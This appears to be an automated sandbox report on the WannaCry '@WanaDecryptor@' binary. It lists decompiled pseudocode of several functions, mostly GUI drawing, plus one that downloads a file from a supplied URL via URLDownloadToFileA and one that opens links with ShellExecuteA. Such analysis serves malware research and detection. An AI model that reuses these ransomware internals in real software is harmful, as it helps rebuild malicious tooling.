Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}

0x004127e0
0x004127e2
0x004127e7
0x004127ed
0x004127ee
0x004127f5
0x004127f8
0x004127fd
0x00412802
0x00412804
0x00412807
0x0041280b
0x0041280f
0x00412813
0x0041287d
0x00412815
0x00412816
0x0041281c
0x0041281e
0x00412825
0x0041282f
0x00412835
0x0041283b
0x00412844
0x00412846
0x00412848
0x00412849
0x0041285a
0x00412860
0x00412862
0x00412868
0x0041286c
0x00412876
0x00412876
0x00412878
0x00412878
0x0041287a
0x0041288b
0x0041288c
0x0041288d
0x00412890
0x00412898
0x0041289f
0x004128a4
0x004128f8
0x004128fa
0x00412906
0x0041290c
0x00412911
0x0041291b
0x004128a6
0x004128a8
0x004128aa
0x004128b2
0x004128b4
0x004128b5
0x004128ba
0x004128ba
0x004128bd
0x004128c3
0x004128cb
0x004128cd
0x004128ce
0x004128d3
0x004128d3
0x004128d6
0x004128d7
0x004128dd
0x004128e2
0x004128e2
0x004128ed
0x004128f7
0x004128f7

APIs

#823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
#823.MFC42(?,?,?), ref: 00412849
#825.MFC42(?), ref: 004128B5
#825.MFC42(?), ref: 004128CE
#825.MFC42(00000000), ref: 004128DD
#823.MFC42(00000008), ref: 004128FA

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #823#825
String ID:
API String ID: 89657779-0
Opcode ID: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
Opcode Fuzzy Hash: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755

Uniqueness

Uniqueness Score: -1.00%

Function 0040B780 Relevance: 9.1, APIs: 6, Instructions: 68
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
				intOrPtr _v12;
				void _v259;
				char _v260;
				char _v264;
				char _v284;
				char _t15;
				int _t19;
				CHAR* _t25;
				signed int _t26;
				char* _t40;

				_t26 = __ecx;
				_t25 = _a4;
				CreateDirectoryA(_t25, 0);
				_t40 = _a8;
				asm("repne scasb");
				if( !(_t26 | 0xffffffff) == 1) {
					L4:
					return 0;
				} else {
					_t15 =  *0x421798; // 0x0
					_v260 = _t15;
					memset( &_v259, 0, 0x40 << 2);
					asm("stosw");
					asm("stosb");
					GetTempFileNameA(_t25, "t", 0,  &_v260);
					_t19 = DeleteUrlCacheEntry(_t40);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(_t40);
					_push(0);
					L004133CE();
					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
						DeleteFileA( &_v284);
						goto L4;
					} else {
						DeleteFileA( &_v284);
						return 1;
					}
				}
			}

0x0040b780
0x0040b787
0x0040b793
0x0040b799
0x0040b7a7
0x0040b7ac
0x0040b81d
0x0040b826
0x0040b7ae
0x0040b7ae
0x0040b7b8
0x0040b7c2
0x0040b7c8
0x0040b7d3
0x0040b7d4
0x0040b7db
0x0040b7e1
0x0040b7e7
0x0040b7e9
0x0040b7ea
0x0040b7eb
0x0040b7ed
0x0040b7f4
0x0040b815
0x00000000
0x0040b827
0x0040b82c
0x0040b83d
0x0040b83d
0x0040b7f4

APIs

CreateDirectoryA.KERNEL32(?,00000000,?,757F3310,00000428), ref: 0040B793
GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
DeleteFileA.KERNEL32(?), ref: 0040B815
DeleteFileA.KERNEL32(?), ref: 0040B82C

Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,757F3310,00000000,00000428), ref: 0040B6B4
Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
String ID:
API String ID: 361195595-0
Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA

Uniqueness

Uniqueness Score: -1.00%

Function 00409A40 Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A40(signed int* _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr* _v24;
				struct tagRECT _v40;
				intOrPtr _v56;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v88;
				intOrPtr _t34;
				void* _t35;
				void* _t53;
				intOrPtr _t56;

				 *[fs:0x0] = _t56;
				_v40.right = 0;
				_v40.top = 0x41679c;
				_v4 = 0;
				E00409D40( &(_v40.bottom), _a4, _a8);
				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
				L00412D5E();
				L00413010();
				_t34 =  *_v24;
				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
				L00412D52();
				_v88 = 0x415c00;
				_v56 = 1;
				L00412D52();
				 *[fs:0x0] = _v64;
				return _t35;
			}

0x00409a4e
0x00409a5d
0x00409a65
0x00409a73
0x00409a82
0x00409a9b
0x00409ac0
0x00409acc
0x00409ad7
0x00409ae4
0x00409aeb
0x00409af0
0x00409afc
0x00409b04
0x00409b0e
0x00409b18

APIs

OffsetRect.USER32(?,?,?), ref: 00409A9B
CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
#1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
#5781.MFC42(0041679C,00000000), ref: 00409ACC
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
#2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414Rect$#1641#5781CreateOffset
String ID:
API String ID: 2675356817-0
Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}

0x004034a0
0x004034a2
0x004034ad
0x004034ae
0x004034ba
0x004034c6
0x004034d6
0x004034d7
0x004034e0
0x004034e4
0x004034e7
0x004034ef
0x00403519
0x0040351f
0x00403524
0x00403529
0x00403535
0x0040353d
0x0040354b
0x00403555

APIs

GetClientRect.USER32(?,?), ref: 004034C6
#283.MFC42(?), ref: 004034D7
#5789.MFC42 ref: 004034EF
PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 00403519
#5789.MFC42(00000000), ref: 00403524
#2414.MFC42(00000000), ref: 0040353D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#2414#283ClientRect
String ID:
API String ID: 3728838672-0
Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55

Uniqueness

Uniqueness Score: -1.00%

Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}

0x00406940
0x00406942
0x0040694d
0x0040694e
0x0040695a
0x00406966
0x00406976
0x00406977
0x00406980
0x00406984
0x00406987
0x0040698f
0x004069b9
0x004069bf
0x004069c4
0x004069c9
0x004069d5
0x004069dd
0x004069eb
0x004069f5

APIs

GetClientRect.USER32(?,?), ref: 00406966
#283.MFC42(?), ref: 00406977
#5789.MFC42 ref: 0040698F
PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 004069B9
#5789.MFC42(00000000), ref: 004069C4
#2414.MFC42(00000000), ref: 004069DD

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#2414#283ClientRect
String ID:
API String ID: 3728838672-0
Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}

0x00404eb0
0x00404eb2
0x00404ebd
0x00404ebe
0x00404eca
0x00404ed6
0x00404ee3
0x00404ee4
0x00404eed
0x00404ef1
0x00404ef4
0x00404efc
0x00404f26
0x00404f2c
0x00404f31
0x00404f36
0x00404f42
0x00404f4a
0x00404f58
0x00404f62

APIs

GetClientRect.USER32(?,?), ref: 00404ED6
#283.MFC42(?), ref: 00404EE4
#5789.MFC42 ref: 00404EFC
PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 00404F26
#5789.MFC42(00000000), ref: 00404F31
#2414.MFC42(00000000), ref: 00404F4A

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#2414#283ClientRect
String ID:
API String ID: 3728838672-0
Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55

Uniqueness

Uniqueness Score: -1.00%

Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}

0x00404316
0x00404318
0x0040431d
0x0040431e
0x00404329
0x00404331
0x00404335
0x00404335
0x0040433f
0x00404344
0x0040434c
0x00404354
0x00404361
0x0040436e
0x00404373
0x00404387
0x0040438a
0x0040438f
0x00404398
0x004043a0
0x004043ab
0x004043b5

APIs

#470.MFC42(?,00000000), ref: 0040433F
#5789.MFC42 ref: 00404354
#5875.MFC42(00000001), ref: 00404361
#6172.MFC42(?,00000001), ref: 0040436E
#5789.MFC42(00000000), ref: 0040438F
#755.MFC42(00000000), ref: 004043A0

Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
String ID:
API String ID: 3301245081-0
Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}

0x00403eb2
0x00403eb8
0x00403eb9
0x00403ebe
0x00403ec5
0x00403eca
0x00403ecb
0x00403ed2
0x00403ed9
0x00403ede
0x00403edf
0x00403ee3
0x00403eea
0x00403ef1

APIs

#3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
#2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
#3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
#2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
#3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
#2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2642#3092
String ID:
API String ID: 2547810013-0
Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
					goto L5;
				}
				return _t17;
			}

0x00406ef0
0x00406f01
0x00406f6a
0x00406f6e
0x00000000
0x00406f6e
0x00406f03
0x00406f06
0x00406f09
0x00406f0f
0x00406f10
0x00406f14
0x00406f15
0x00406f1d
0x00406f23
0x00406f25
0x00406f2d
0x00406f2f
0x00406f2f
0x00406f3f
0x00406f57
0x00406f5d
0x00406f61
0x00406f62
0x00000000
0x00406f67
0x00406f78

APIs

#823.MFC42(?), ref: 00406F15
SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
#825.MFC42(?), ref: 00406F62

Strings

open, xrefs: 00406F50

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

